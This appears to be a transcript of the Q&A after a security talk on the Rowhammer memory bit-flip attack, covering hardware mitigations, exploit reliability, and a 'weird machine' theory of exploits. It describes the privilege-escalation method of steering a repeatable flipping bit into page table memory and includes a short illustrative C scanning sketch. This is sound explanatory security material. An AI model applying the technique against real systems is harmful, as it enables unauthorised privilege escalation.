For the server side, ECC mitigates a lot of the problems: it essentially turns the privilege escalation issue into a denial-of-service issue, because a single random bit flip will only cause the ECC to complain, and the odds of getting the three simultaneous bit flips you'd need to bypass most ECC schemes are very, very low. So with ECC this is not much of a problem. For mobile devices, there's a new RAM standard called LPDDR (low-power DDR) that has mitigations for this embedded. The laptop OEMs mostly reacted by rolling out BIOS updates that doubled the refresh rate of the RAM, refreshing it not every 64 milliseconds but every 32 milliseconds, which has negative effects on both performance and battery life. So by and large the hardware industry knows about this, but nobody was happy to hear about it. And from what I could tell, the dynamics in the hardware industry were very weird: some people had heard about it, some had tried to mitigate it, some hadn't heard about it at all. The culture that software has, where you unify everybody that has a particular bug and a task force makes sure it all gets fixed, that sort of cooperation wasn't quite there. I think they've built it by now, I guess. I think the software industry just has a bit more experience with dealing with flaws, because we tend to ship more flawed products.

[Audience] Initially you showed a particular probability, 30% I think, in the slides. Is that your assessment of the probability of being able to use this particular exploit?

So, assuming a perfectly random bit flip, the probability was about 30% for the privilege escalation, because about 30% of the page table entry consists of fields that are useful: if you get a bit flip in any of them, it's going to be useful. In practice the reliability was much higher, because what happens in practice is that when a bit in RAM flips, it will always flip at the same point: it's a hardware impurity, a hardware issue, so if you can get a bit in RAM to flip once, you can get it to flip again. So what the exploit would do is search through RAM until it found a flipping bit that was aligned in a way that would be useful, and then we made sure that the memory that bit sits in was reused for page table entries thereafter. On a machine that had bit flips, we essentially achieved a reliability of more or less 100%, because every bit flip gives you the one-in-three chance of being useful, and if you search through a machine and find more than five or six flipping bits, you will get one that is useful. If that makes any sense.
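The scanning step just described can be pictured with a minimal sketch: fill a region with a known pattern, hammer, then look for any word that no longer matches. The names and the all-ones pattern are mine; the published exploit is considerably more involved.

    #include <stddef.h>
    #include <stdint.h>

    /* Returns the index of the first word whose bits changed, or -1.
     * A flip found this way is repeatable, so the page it sits in can
     * later be released and re-used for page table entries. */
    static ptrdiff_t find_flip(volatile uint64_t *region, size_t nwords)
    {
        for (size_t i = 0; i < nwords; i++)
            region[i] = ~0ULL;           /* all ones */

        /* ... hammer the neighboring rows here ... */

        for (size_t i = 0; i < nwords; i++)
            if (region[i] != ~0ULL)
                return (ptrdiff_t)i;     /* a bit decayed from 1 to 0 */
        return -1;
    }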
[Audience] One additional question. You presented quite good scenarios, but has there been any study or analysis of this exploit in the context of SCADA systems and critical infrastructure, which would be much more impactful than the public's laptops and devices?

So, it is possible that SCADA systems are less affected than regular systems, simply because they are old. The time window for this was the DDR3 RAM generation, a window of about three years. If you ran a SCADA system, or any system, without ECC at the time that this RAM was manufactured and delivered, then you may have the problem; if you were running it with ECC RAM, then you may not. I don't know what percentage of SCADA systems run ECC, and I don't know what percentage of SCADA systems were delivered in that time frame. If the memory is too old, it's not a problem, because the wires weren't close enough together; and if the memory is really new, the specifications, DDR4 included, will have fixed the issue.

There's also another funny area: the only reason this didn't turn into a universal jailbreak for all mobile phones is that the ARM memory controller seems to be much slower than the Intel memory controller, so you can't hammer quickly enough on an ARM CPU, at least as far as we know. Mobile phones seem to have been very heavily affected by bad RAM, because what seems to happen is that when the RAM vendors can't sell the RAM to the server people or the desktop or laptop people, they sell it to the mobile phone people. In general, the level of reliability people expect from a mobile phone is less than the level of reliability people expect from a laptop; that's just a reality.

[Audience] You seem to place a lot of faith in academia, so I'd really like to know your rationale. As far as I know, universities, and I'm talking about quite recent syllabi from top universities which I won't name, teach security with professors who have never done anything hands-on in their life. What's a zero-day to them? Maybe a zero-point-one-day. And security is really real-time: what happened today, somebody will do something with tomorrow, and the whole landscape can change. The other thing is, you mentioned the Turing machine, which seems to be a god in academia, something academia worships. If you go read the papers in security, whether in IEEE Transactions or ACM, nothing is real. So how can they explain and talk about exploits, when an exploit is a real, tangible thing, and none of this is updated, even up to the PhD level? So I'd like to hear about your faith in academia.

So, my faith in academia is roughly the same faith I have in industry. The 90-10 rule applies everywhere: 10% of the people do good work, 90% of the work being done is bad, and that seems to apply uniformly across all human endeavors. I agree that in security we have an added challenge: the field is very young, we're grappling with a lot of things we don't understand, and it's changing all the time. I was very lucky in the sense that in the 18 or 19 years I've been doing this, I was there right after the field was born and could watch it grow. But I think it's a problem for both industry and academia that the field is growing so much faster than we can teach: you go to a big conference now, and because the field has doubled in size essentially every year over the last couple of years, most of the people there have very little experience and have forgotten a lot of the lessons. Something that happened to me: at a research prize in Germany, I've seen a situation where the committee awarding the prize had all joined security in the last six or seven years, and they awarded the prize for something that was more or less a bad redo of a ten-year-old result; they just hadn't seen the ten-year-old result, because they had joined security after it. And that can
be very infuriating if you've been a practitioner for a long time. A nice example is return-oriented programming, where the practitioners' community had been doing this for many, many years: it was folklore knowledge in the community, and nobody deemed it particularly interesting. And then there are academics who have built their entire careers on variations of return-oriented programming once it became an academic thing. For the people who have been doing this for ages, that is of course very infuriating. Somebody once sent me a paper he wanted to publish, prior to his PhD, on return-oriented programming before it became a thing, and I told him: listen, that's not really interesting, why would you publish this? And then somebody else built a big academic career on it. But the fault there also lies with our community, in the sense that the security community has folklore knowledge, a lot of unwritten understanding of things. For example, "one bit flip is enough": everybody who does a lot of offense knows that one bit flip is often enough, but it's not written down anywhere, and if it's not written, it can't be taught. So I don't have particular faith in academia, nor in industry, but I know that if we don't write down the stuff we learn, structure it properly, and then teach it well, we won't be able to solve these issues, because the demand for people who understand this is so high that we can't teach them fast enough. Did that answer your question?

[Audience] It's interesting to hear about your faith.

Realistically, as a human, if you look bluntly at humanity, you only have two choices: you believe in our demise, or you believe in our survival. I believe in our long-term demise and our short-term survival, and I'll try to do my best on the short-term survival. Any other questions? Yes.

[Audience] It's actually a very interesting problem, formally describing what an exploit is. I've never thought about this before, to be honest, so it's kind of a very interesting problem, and from my perspective I have a feeling that if you try to solve this, it goes back to the roots: trying to formally describe what is good and evil in technology. What are your thoughts about that? How would you step into this area?
So, I've been thinking about this for a while and hope to write it down properly at some point, hopefully this year. You're right in the sense that you need to define good and bad, and in our situation, what we need to do is this. I mentioned that the programmer defines a state machine and gets to emulate it on the toy CPU. If you think about computer programming now: when the programmer writes a program, he has an intent; he wants to build a particular piece of software, and this intended software, which is not exploitable, is the thing he wants to achieve. Then he writes that software, and while writing it he makes mistakes, so you end up with an implementation that is almost the machine he wanted to build, but not quite, because a few states are reachable that shouldn't be reachable under his definition of the good machine. That's the bug.

I may actually need the whiteboard for this. Sure. So let's say we have a state machine, and we've got these transitions between states. The designer of the software has a state machine in his head when he designs the software, and then he tries to implement that state machine by writing code to actually perform these transitions; there are many lines of code, and most of the time, when you're writing code, you're trying to get the state machine in your head from one state to the other. Now, the trouble is: when you accidentally create a new state, because of a bit flip or because you've made a mistake, all these transitions are still available. So now you have what I call a weird state, and then you transform this into an even weirder state using one transition, and into an even weirder state using the next transition, and the set of possible states blows up and becomes everything. Exploitation is programming the weird machine: you have the intended machine, and as soon as one state is corrupted, you have a weird machine, a machine that is still programmable by providing more input to it, and that still mutates from one state to the other, but whose set of states is much larger than anybody even imagined. The goal of the attack is to drive this weird machine to a state where it's useful. A lot of people who have been writing exploits have this as a sort of meta-theorem, a meta-understanding, in their head, and that's the model they use for writing exploits; but nobody has written it down in a proper way, most people have only an intuitive understanding of it, and the leap of formalizing that intuitive understanding hasn't been properly made yet.

[Audience] Once again, the same model applies to a plain software bug: it's an undefined state. So what makes the exploit different?

So, the bug is the thing that causes the first weird state; the exploit is programming along these transitions to reach a different state, a state that violates security assumptions. The program has an intended state machine, and that state machine has security assumptions, like "X, Y, Z can never happen". The attacker uses a state that shouldn't have been there in the first place and then carefully drives this weird machine to a state where the assumptions of the defender, the security properties of the system, are violated. Does that make sense? (A toy illustration of this follows below.)
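A toy illustration of that answer, entirely my own construction: the designer enumerates three states, but the byte emulating the machine can hold 256 values. After one flipped bit, the same transition code keeps running, and chosen input drives the weird state wherever the attacker likes.

    #include <stdio.h>

    enum { IDLE = 0, AUTHED = 1, CLOSED = 2 };   /* the intended states */

    static unsigned char step(unsigned char state, unsigned char input)
    {
        if (state == IDLE   && input == 'a') return AUTHED;
        if (state == AUTHED && input == 'q') return CLOSED;
        /* "Can't happen" fallback, written with only the three intended
         * states in mind; on a weird state it becomes a state-mutation
         * primitive the attacker can steer with chosen inputs. */
        return state ^ input;
    }

    int main(void)
    {
        unsigned char s = IDLE;
        s |= 0x80;                   /* a single flipped bit: a weird state */
        s = step(s, 0x81);           /* attacker input programs the machine */
        printf("state = %d\n", s);   /* 0x80 ^ 0x81 == AUTHED, without login */
        return 0;
    }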
Any other questions?

[Audience] Have you ever found any signs of Rowhammer being exploited in the wild?

So, we haven't seen any signs of Rowhammer being exploited in the wild. Seeing it would be fairly difficult, and as an attacker you would need to be very desperate to use it, because the sad reality is, to quote, or paraphrase, an unnamed operating system vendor... can we switch the camera off before I do so? Sorry.